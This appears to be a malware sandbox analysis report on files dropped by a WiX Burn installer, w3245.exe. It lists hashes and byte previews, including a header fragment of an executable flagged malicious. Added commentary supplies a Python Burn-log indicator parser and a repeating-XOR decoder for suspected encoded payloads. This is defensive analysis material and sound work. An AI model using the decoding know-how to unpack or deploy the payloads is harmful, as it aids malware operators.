                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):154477
                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):968
                                                                                                                                                            Entropy (8bit):5.422682064404116
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:mRKbAIeLLzz0RBQkRqcP2w9RqcP2MaR7fkcP2Uf6lR7fkcP2sMR7fkcP23hv:mmxYz0RvJvC9f7h6l9f7lM9f7Ov
                                                                                                                                                            MD5:25B9C067C7598A6DF2D9B71021AA6D91
                                                                                                                                                            SHA1:2B6A3A9D2E5C1D120691106EF39BF70AB300B8E7
                                                                                                                                                            SHA-256:5E91BEB2C3C040874D1284CBD7AD14BA10CF7ECB9358CAF6CC9694EEF6CF779D
                                                                                                                                                            SHA-512:CA1BCF3596DBF3D043C4D478A59D6EF38DBDCF6A9D6DEBD3E6E8EBF5D84D7BBFC249A360901CE5818E844F1CD403F29C48BEBFCD58CCE41ACEC5779A366E54E8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[1BB0:1BAC][2025-01-06T17:03:58]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe..[1BB0:1BAC][2025-01-06T17:03:58]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\w3245.exe -burn.filehandle.attached=540 -burn.filehandle.self=528'..[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\w3245.exe'..[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106170400.log'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..
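The 968-byte text file above is a WiX Burn engine log: the bundle copied itself to a "clean room" directory under C:\Windows\Temp\{GUID}\.cr\ and relaunched with -burn.clean.room pointing back at the original w3245.exe. That relaunch is standard Burn behaviour and is not by itself an indicator; the lines worth pivoting on are the engine version, the original source path and the WixBundle* variables (here the bundle calls itself 'Hebephrenia' from manufacturer 'Windlestraw'). The following parser is an added example, not part of the report or of the WiX toolset; it assumes the `[pid:tid][timestamp]code: message` line shape visible in the preview and is fed a constructed copy of those preview lines (the `..` in the preview is the CRLF the file type reports).

```python
import re

# Constructed sample: the Burn log lines shown in the dropped-file preview,
# re-joined with the CRLF terminators the file type reports.
SAMPLE_LOG = "\r\n".join([
    r"[1BB0:1BAC][2025-01-06T17:03:58]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe",
    r"[1BB0:1BAC][2025-01-06T17:03:58]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\w3245.exe -burn.filehandle.attached=540 -burn.filehandle.self=528'",
    r"[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\w3245.exe'",
    r"[1BB0:1BAC][2025-01-06T17:03:58]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'",
    r"[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250106170400.log'",
    r"[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'",
    r"[1BB0:1BAC][2025-01-06T17:04:00]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'",
]) + "\r\n"

# One Burn log line: [pid:tid][ISO timestamp]<letter><3 digits>: message
LINE_RE = re.compile(r"^\[([0-9A-Fa-f]+):([0-9A-Fa-f]+)\]\[([^\]]+)\]([a-z]\d{3}): (.*)$")
ENGINE_RE = re.compile(r"^Burn v([\d.]+), .*path: (.+)$")
CMD_RE = re.compile(r"^Command Line: '(.*)'$")
# Lazy match so a clean-room path containing spaces survives; stops at the
# next "-burn." switch or end of string.
CLEAN_ROOM_RE = re.compile(r"-burn\.clean\.room=(.+?)(?=\s-burn\.|$)")
VAR_RE = re.compile(r"^Setting (?:string|numeric|version) variable '([^']+)' to value '(.*)'$")


def parse_burn_log(text: str) -> dict:
    """Reduce a Burn engine log to the fields an analyst pivots on."""
    summary = {
        "engine_version": None,   # Burn engine version from the i001 line
        "engine_path": None,      # where the relaunched engine ran from
        "command_line": None,     # raw command line from the i009 line
        "clean_room_source": None,  # original bundle the clean room was spawned from
        "variables": {},          # every "Setting ... variable" assignment
    }
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # continuation lines and noise are ignored
        _pid, _tid, _ts, code, msg = m.groups()
        if code == "i001":
            e = ENGINE_RE.match(msg)
            if e:
                summary["engine_version"], summary["engine_path"] = e.groups()
        elif code == "i009":
            c = CMD_RE.match(msg)
            if c:
                summary["command_line"] = c.group(1)
                cr = CLEAN_ROOM_RE.search(c.group(1))
                if cr:
                    summary["clean_room_source"] = cr.group(1)
        elif code == "i000":
            v = VAR_RE.match(msg)
            if v:
                summary["variables"][v.group(1)] = v.group(2)
    return summary


def burn_indicators(summary: dict) -> dict:
    """The handful of values worth carrying into a hunt or a detection:
    bundle name/manufacturer, original source, and the engine's own log path."""
    v = summary["variables"]
    return {
        "bundle_name": v.get("WixBundleName"),
        "manufacturer": v.get("WixBundleManufacturer"),
        "original_source": v.get("WixBundleOriginalSource") or summary["clean_room_source"],
        "bundle_log": v.get("WixBundleLog"),
        "engine_path": summary["engine_path"],
    }


if __name__ == "__main__":
    print(burn_indicators(parse_burn_log(SAMPLE_LOG)))
```

The name/manufacturer pair is set by whoever built the bundle, so it is a cheap string to hunt for in other Burn logs under %TEMP%, while the engine version and clean-room path are shared with every legitimate WiX 3.11 installer.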
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2364728
                                                                                                                                                            Entropy (8bit):6.606009669324617
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                            MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                            SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                            SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                            SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                             • Filename: 9mauyKC3JW.exe, Detection: malicious
                                                                                                                                                             • Filename: ATLEQQXO.exe, Detection: malicious
                                                                                                                                                             • Filename: ATLEQQXO.exe, Detection: malicious
                                                                                                                                                             • Filename: upgrade.hta, Detection: malicious
                                                                                                                                                             • Filename: MiJZ3z4t5K.exe, Detection: malicious
                                                                                                                                                             • Filename: UolJwovI8c.exe, Detection: malicious
                                                                                                                                                             • Filename: ONHQNHFT.msi, Detection: malicious
                                                                                                                                                             • Filename: es.hta, Detection: malicious
                                                                                                                                                             • Filename: BkTwXj17DH.exe, Detection: malicious
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11185
                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5698949
                                                                                                                                                            Entropy (8bit):7.742488641620752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:n+H5f7DiV9F4J09curnesgCUmMFckkVYXaPvvox:Y5zDw9FRzrefFFkmXQvvox
                                                                                                                                                            MD5:005514AFFA56E5F3F6FE803344FE1ED8
                                                                                                                                                            SHA1:DFB87B0EBDABEB703BBA4ECCDAF34FBBA6BE1D1F
                                                                                                                                                            SHA-256:80ED23F72A1EC8992CB86616D00D7C36B1A5903ADC2DF0424BFF0528BC02F984
                                                                                                                                                            SHA-512:B93D80177247BE71F6831776302F79B8D1C5EB87A8865B37E8A6A0ED5BE4074E243DBC41E6915A8AD20BDCAFDD0425F3BD9E588F0F2783F2A022EEDED9841D43
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Y3J%[3J%Z3J%Z3J%[3J%~3J%N3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3K%.r.u.r.d.o.L9A%V5U>y.Z$A5D9y.G+W...@4F.u(\-W;^9y.G+W.F:%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.K3G#D6Z0@.KJ%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.W?R>@.]9Q;])@Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.d.k.z...~#F(\9J<Gdk.g.c(R'@-\8NZ3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%,.d.t.z.h.J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):353
                                                                                                                                                            Entropy (8bit):5.346884086764322
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YEyL1d+qynP56s/uyL1dwcEXpHEuQJjDrwv/uyL10ZWvGP56s/C:Yt13256s//1mp0Dkv//11i56s/C
                                                                                                                                                            MD5:32476C0D33020910F2C00BDD6EAFD4F2
                                                                                                                                                            SHA1:82A27DBD5B08A04C8AD86F39DC50C9B62E4561EB
                                                                                                                                                            SHA-256:AB3EEE93E9F199B86308B849A992081DD753391307782D032AD09543C1C15D85
                                                                                                                                                            SHA-512:A3F7AA43D964918FAD101C6E6538A7E09EA67868F5184853EC3D08103038DA58C6A626F969C97BFD0868EC0182443CA938C9A9781CD5E5F34CF2DA63C05CCB85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"logTime": "0106/220504", "correlationVector":"tpHCHeS01AGZQJUdY4JSSe","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0106/220504", "correlationVector":"24BFD88065F846AAAF9AE4D5957A3E2B","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0106/220504", "correlationVector":"EPNPWReibIjs4+ZA468qbC","action":"EXTENSION_UPDATER", "result":""}.
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5698949
                                                                                                                                                            Entropy (8bit):7.742488581380998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:k+H5f7DiV9F4J09curnesgCUmMFckkVYXaPvvox:X5zDw9FRzrefFFkmXQvvox
                                                                                                                                                            MD5:40292E5442FA7F44AF725A8BC315E80E
                                                                                                                                                            SHA1:9EA6359AC7BDB0C5978A81B4F7C39C11F0A13352
                                                                                                                                                            SHA-256:E8EE34A6884A4346A35E8A9EF5DFB8D19C1121E93934F43CD021B8C3D1F27F64
                                                                                                                                                            SHA-512:D7C20B1A0C33CC9E0E860D0779EB7D32DAE17E09CBDF92F0936568F2256D6AB2A569AA5AAF9D8A9B9A4840672F194A84237F0429542525914D9F7C4BF6F78C23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Y3J%[3J%Z3J%Z3J%[3J%~3J%N3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3K%.r.u.r.d.o.L9A%V5U>y.Z$A5D9y.G+W...@4F.u(\-W;^9y.G+W.F:%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.K3G#D6Z0@.KJ%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.\.W?R>@.]9Q;])@Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%.d.k.z...~#F(\9J<Gdk.g.c(R'@-\8NZ3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%,.d.t.z.h.J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%Z3J%
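The two 5698949-byte "data" files written by RescueCDBurner.exe (the record above and the one a few records earlier) have the same size, an entropy that differs only in the ninth decimal, an identical-looking preview and yet different hashes, so they are most likely two encodings of the same or nearly the same content. The preview itself is dominated by the 4-byte sequence `Z3J%`, which is exactly what a repeating-key XOR looks like where the plaintext is zero-filled (section padding, slack). The report says nothing about the encoding, so this is a hypothesis to test on the files, not a finding. The following is an added example, not part of the report, that tests that hypothesis on a constructed buffer: it guesses the key as the most frequent key-aligned block (assumes zero runs are the most common content), decodes, and runs a cheap plausibility check. With 7.74 bits/byte overall the padding is a minority of the file, so the winner's share will be small in practice; the useful signal is that a random 4-byte block almost never repeats, whereas the padding block repeats thousands of times. The last function decodes only the 28 printable preview bytes, which the report shows exactly, under the `Z3J%` hypothesis and returns them as little-endian 32-bit values.

```python
from collections import Counter
from itertools import cycle
import struct

# The first 28 bytes of both "data" previews above. All are printable, so the
# report shows them exactly rather than as '.' placeholders.
PREVIEW_HEAD = b"Y3J%[3J%Z3J%Z3J%[3J%~3J%N3J%"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key cycled from offset 0; the operation is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def guess_repeating_key(data: bytes, max_len: int = 8):
    """Guess a repeating XOR key of length 1..max_len.

    Assumption: the plaintext contains zero-filled runs, so the most frequent
    key-aligned block of ciphertext is the key itself (zero XOR key = key).
    Returns (key, share), share being the fraction of aligned blocks equal to
    the winner. Lengths are tried ascending and a longer candidate replaces a
    shorter one only on a strictly higher share, so "Z3J%" wins over "Z3J%Z3J%".
    """
    best_key, best_share = b"", 0.0
    for n in range(1, max_len + 1):
        blocks = [data[i:i + n] for i in range(0, len(data) - n + 1, n)]
        if not blocks:
            break
        top, count = Counter(blocks).most_common(1)[0]
        share = count / len(blocks)
        if share > best_share + 1e-9:
            best_key, best_share = top, share
    return best_key, best_share


def looks_like_pe(data: bytes) -> bool:
    """Cheap plausibility check for a decoded buffer: MZ at 0 and PE\\0\\0 at
    e_lfanew. Only one of several checks an analyst would run; a decoded
    blob may equally be a config, an archive or a second-stage script."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decoded_preview_head(key: bytes = b"Z3J%") -> list:
    """Decode the visible preview prefix under the key hypothesis and return
    it as little-endian u32 values (small integers, i.e. header-like, if the
    hypothesis holds)."""
    plain = xor_repeating(PREVIEW_HEAD, key)
    return list(struct.unpack("<%dI" % (len(plain) // 4), plain))


def make_sample(key: bytes = b"Z3J%") -> bytes:
    """Constructed test input, not taken from the sample: a minimal PE-shaped
    buffer with lots of zero padding, encoded with the given key."""
    plain = bytearray(4096)
    plain[:2] = b"MZ"
    struct.pack_into("<I", plain, 0x3C, 0x80)
    plain[0x80:0x84] = b"PE\x00\x00"
    plain[0x200:0x200 + 22] = b"hello from the payload"
    return xor_repeating(bytes(plain), key)


if __name__ == "__main__":
    blob = make_sample()
    key, share = guess_repeating_key(blob)
    print(key, round(share, 3), looks_like_pe(xor_repeating(blob, key)))
    print(decoded_preview_head())
```

Run the guesser over each of the two real files and compare the decoded outputs rather than the raw ones: if both decode to the same plaintext under different keys, the hash difference is just key rotation; if they decode to different plaintexts, diff the decoded forms to see what RescueCDBurner.exe changed between writes.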
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):31335
                                                                                                                                                            Entropy (8bit):7.694019108205432
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                            MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                            SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                            SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                            SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 21:04:02 2025, mtime=Mon Jan 6 21:04:02 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.022645800380404
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8eBd6/KX+hZNoUt2Fgvi8ATsRUUoqfBm:8CdCRZNoUPv+m9om
                                                                                                                                                            MD5:DF24604C96B0D4598694703AF221B42C
                                                                                                                                                            SHA1:FDCA053713EEAB76908A3AEF49A90A53C5B0F739
                                                                                                                                                            SHA-256:DE12CA678123CACD9CC3DF42299504C3445D6E674DC72359878A03D665BCE12D
                                                                                                                                                            SHA-512:5DEF470BF391B89C592867D01ECAA096AA795B657612AA72231A6E263E725A54DF124688070C835095CC2440A8749887AE3E90F177466529D2AAE6AB21A05634
                                                                                                                                                            Malicious:false
